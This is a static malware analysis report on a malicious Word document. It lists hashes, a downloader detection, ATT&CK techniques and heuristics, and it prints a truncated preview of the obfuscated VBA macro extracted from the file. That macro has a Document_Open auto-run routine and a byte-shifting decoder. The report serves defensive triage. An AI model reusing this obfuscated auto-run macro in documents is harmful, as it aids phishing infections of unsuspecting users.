Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc4a3db433b364e7…

MALICIOUS

Office (OLE)

291.5 KB Created: 2018-04-24 13:18:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 0afacf95729e475e59225cdd76837408 SHA-1: 443b2a2bf689bad812fa9ff3254b349120cf6242 SHA-256: bc4a3db433b364e768b1321be773c9da982b394ae04287b8f54a5d7c993862c0
124 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initiating malicious actions. The presence of the 'macros.bas' artifact and the ClamAV detection 'Doc.Downloader.Macro-6539595-0' strongly indicate that this macro is designed to download and execute a secondary payload. The document body content appears to be unrelated biographical information, likely a lure.

Heuristics 5

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11012 bytes
SHA-256: f39da388195cb52d7098d0992e9447cf40802925ea726d0c49baa270fda4cddc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Open()
cattleman
bullheaded = 58 + 39
 Pmt 0, bullheaded, 25307, 29079, 3
End Sub




Attribute VB_Name = "bModule"
Function liliidae(arytenoid)
Dim arius As Integer
Dim caseworm As Byte
Dim clofibrate As Variant
Dim grinder As String
#If (22 - 89 + 467 + 103 - 96 + 293) > ((81 - 105 + 344) - (79 - 97 + 558) * 1) And ((76 - 48 + 0) - (43 - 116 + 101)) * 2 < (Win64) Then
Dim discrete As Byte
Dim lanthorn As LongPtr
cwater = 20 - 50 + 38
Dim foxhound As LongPtr
Dim distinction As Byte
Dim coryphaenidae As Integer
Dim impunity As LongPtr
Dim canthus As Long
dexterity = VarPtr(lanthorn)
convener = dulce(dexterity, VarPtr(arytenoid) + (68 - 92 + 32), cwater)
#ElseIf (116 - 24 + 308 + 18 - 58 + 340) > ((115 - 110 + 315) - (32 - 79 + 587) * 1) And Not ((4 - 53 + 77) - (107 - 86 + 7)) * 2 < (Win64) Then
Dim lanthorn As Long
cwater = 72 - 40 - 28
Dim foxhound As Long
Dim impunity As Long
dexterity = VarPtr(lanthorn)
convener = cromwell(dexterity, VarPtr(arytenoid) + (67 - 57 - 2), cwater)
#End If
sharply = 106 - 111 + 4
foxhound = 79 - 123 + 44
libration = 82 - 79 - 3
impunity = 3 - 28 + 9628
mespilus = 86 - 64 + 4074
paleocrystic = 95 - 45 + 14
deprive = arrive(ByVal sharply, _
foxhound, ByVal libration, impunity, ByVal mespilus, _
ByVal paleocrystic)
culicidae = culicidae
catabolic = "filamentiferous"
#If (22 - 89 + 467 + 103 - 96 + 293) > ((81 - 105 + 344) - (79 - 97 + 558) * 1) And ((76 - 48 + 0) - (43 - 116 + 101)) * 2 < (Win64) Then
avoidless = dulce(foxhound, lanthorn, 29 - 122 + 5976)
#ElseIf (116 - 24 + 308 + 18 - 58 + 340) > ((115 - 110 + 315) - (32 - 79 + 587) * 1) And Not ((4 - 53 + 77) - (107 - 86 + 7)) * 2 < (Win64) Then
avoidless = cromwell(foxhound, lanthorn, 29 - 122 + 5976)
#End If
baronet = 49 + 6
Pmt 0, baronet, 21495, 16228, 2
liliidae = foxhound
End Function


Attribute VB_Name = "cModule2"
Function dulce(ganger, doorpost, cantharides)
Dim standdown As Long
Dim evaluation As Variant
Dim printable As LongPtr
Dim clough As LongPtr
Dim lumberyard As LongPtr
Dim fb As Variant
Dim formulary As LongPtr
Dim muerte As LongPtr
culicidae = culicidae
catabolic = "elbowing"
clough = ganger
muerte = cantharides
phoebe = Rnd(432)
formulary = doorpost
adventism = 6 + 46
 Pmt 0, adventism, 38772, 22864, 6

catoptromancy = Math.Round(453)
printable = 87 - 43 - 45
meprobamate ByVal printable, _
clough, _
formulary, muerte, _
lumberyard
frantic = Math.Round(160)
End Function
Function offspring(unbelieving) As String
Dim bene(6962) As Byte
Dim prehension(63) As Long
Dim obligations() As Byte
Dim undervaluation(63) As Long
Dim colonization(63) As Long
Dim kid As Long
Dim agamist As Long
Dim acoraceae As String
Dim flora As Long
culicidae = "linouae"

Dim oblong As Integer
Dim conversing As Long
asclepiadaceous = 48 - 16 + 224
earwitness = 115 - 119 + 4100
handsomely = 106 - 77 + 258019
Dim ablepsia As Long

Dim ascertained As Byte

chimneysweeper = 87 - 11 + 262068
abridgment = 71 - 71 + 65280
myxophyceae = 76 - 34 + 213
alarmism = 31 - 5 + 4006
Dim atop As String

adroit = 97 - 25 + 16711608
reproach = 79 - 4 - 12
balderdash = 9 - 87 + 142
nonassertive = 81 - 2 + 16514993
halfmoon = 86 - 46 + 65496
Dim arch As String
avahi = 67 - 23 + 7799
Dim exhale() As Byte
exhale = VBA.StrConv(unbelieving, 120 + 8)
econometrician = 25 + 59
 Pmt 0, econometrician, 29566, 50946, 6

stevedore = 7843
crowbait = vbKeyShift - 12
For min = 0 To stevedore
If min Mod 2 = 0 Then
exhale(min) = exhale(min) - crowbait
Else
exhale(min) = exhale(min) - (crowbait - 1)
End If
Next min
baroreceptor = 48 + 16
 Pmt 0, baroreceptor, 38624, 32641, 2

oblong = 0
primeval = barred
For conversing = (16 - 8 * 2) * 1 To (80 / 2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.